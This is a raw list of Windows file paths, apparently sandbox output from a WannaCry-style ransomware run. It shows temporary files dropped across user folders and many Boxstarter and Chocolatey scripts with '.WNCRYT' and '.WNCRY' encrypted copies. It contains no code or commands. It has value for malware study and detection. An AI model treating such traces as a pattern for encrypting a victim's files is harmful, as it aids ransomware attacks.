C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\~SD34A3.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\~SD34A4.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\~SD34A5.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\~SD3532.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\~SD35A1.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\~SD35D1.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\~SD3610.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\~SD3650.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\~SD369F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\temporary\~SD371D.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\~SD378B.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\failed\~SD37BB.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\toFetch\~SD37EB.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD380B.tmp
C:\Users\user\AppData\Roaming\Skype\~SD385A.tmp
C:\Users\user\AppData\Roaming\Skype\RootTools\~SD388A.tmp
C:\Users\user\AppData\Roaming\Sun\~SD38AA.tmp
C:\Users\user\AppData\Roaming\Sun\Java\~SD38BB.tmp
C:\Users\user\AppData\Roaming\Sun\Java\Deployment\~SD38DB.tmp
C:\Users\user\Contacts\~SD38EC.tmp
C:\Users\user\Desktop\~SD38ED.tmp
C:\Users\user\Documents\~SD38FE.tmp
C:\Users\user\Documents\WindowsPowerShell\~SD391E.tmp
C:\Users\user\Downloads\~SD393E.tmp
C:\Users\user\Favorites\~SD396E.tmp
C:\Users\user\Favorites\Links\~SD397F.tmp
C:\Users\user\Favorites\Links for United States\~SD39BE.tmp
C:\Users\user\Links\~SD39DE.tmp
C:\Users\user\Music\~SD3A0E.tmp
C:\Users\user\OneDrive\~SD3A2E.tmp
C:\Users\user\Pictures\~SD3A4F.tmp
C:\Users\user\Saved Games\~SD3A6F.tmp
C:\Users\user\Searches\~SD3AAE.tmp
C:\Users\user\Videos\~SD3AFE.tmp
C:\vlmcsd\~SD3B2D.tmp
C:\BOOTSECT.BAK.WNCRYT
C:\BOOTSECT.BAK.WNCRY
C:\ba69bdf0a250e352360c33\header.bmp.WNCRYT
C:\ba69bdf0a250e352360c33\header.bmp.WNCRY
C:\ba69bdf0a250e352360c33\SplashScreen.bmp.WNCRYT
C:\ba69bdf0a250e352360c33\SplashScreen.bmp.WNCRY
C:\ba69bdf0a250e352360c33\watermark.bmp.WNCRYT
C:\ba69bdf0a250e352360c33\watermark.bmp.WNCRY
C:\Users\All Users\Boxstarter\BoxstarterShell.ps1.WNCRYT
C:\Users\All Users\Boxstarter\BoxstarterShell.ps1.WNCRY
C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRY
C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd.WNCRYT
C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1.WNCRYT
